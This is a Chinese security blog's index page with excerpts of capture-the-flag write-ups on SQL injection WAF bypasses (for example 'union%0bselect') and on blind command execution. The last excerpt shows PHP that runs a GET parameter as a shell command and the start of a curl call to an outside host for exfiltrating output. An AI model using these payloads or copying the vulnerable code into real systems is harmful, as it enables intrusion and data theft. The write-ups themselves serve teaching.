Sky's blog

Sky's blog

热爱Web的蒟蒻一叶飘零/BXS-TEAM

skysql之union绕waf
前记以前校赛的时候出了一道skysql灵感来自于bendawang师傅的一篇博客(像巨佬致敬orz)今天正好有空写了一下题解 题目解法题目过滤比较严格盲注和报错注入都不太容易实现但是不难发现单个fuzz的话union和select都没有被过滤但是联合一起的话,union select是被过滤的所以我可以猜想他的waf正则写法是:1|union select| 所以我们可以尝试绕过1union%0bselect 此时发现union select是可以用的但是问题又出现了:没有逗号那么如何解决呢?这里也是比较长谈的绕过问题了我们先看正常使用的时候而当逗号被过滤时,我们可以使用join绕过此时...
有点意思的3道web题
前言昨晚看完了前任3,虐的有点厉害……写篇博客压压惊(哎……所有的分手总有一个人先放弃,两情相悦总归也有付出更多的那一方,选择一个更爱你的人,还是你更爱的人是一个值得思考的问题) 绕过云waf题目简述题目来自最近的xctf赛博地球杯工业互联网安全大赛,是一道比较有趣的云waf绕过题目,题目过滤比较多,留下能用的只有like,regexp等为数不多的函数,这里我将介绍两种方法: 题目解法一这是属于比较常规的思路,即fuzz一下过滤参数,然后找到未被过滤的参数,进行拼接绕过waf,这里题目限制严格,而手动测试容易得知:121. or的过滤可以用||绕过2. 空格的过滤可用%0a绕过 而后我们...
Time_Based_RCE
前言想必大家遇到RCE的题目不算少数,那么如果题目可以命令执行,却没有回显,那么我们应该如何有效打击呢? 盲打RCE先看这样一段函数:123<?php$cmd = $_GET[`cmd`];echo `$cmd`; 对于这样的情况,我们可以直接?cmd=ls即可拿到回显:1docker-compose.yml flag index.php 但是如果题目变成123<?php$cmd = $_GET[`cmd`];`$cmd`; 又该怎么办呢?这里的命令执行结果显然不会打印出来,那么我们如何获取到这个结果?这里介绍一种方法:1curl http://ip.port.b182oj....
一叶飘零
苟有恒,何必三更眠五更起。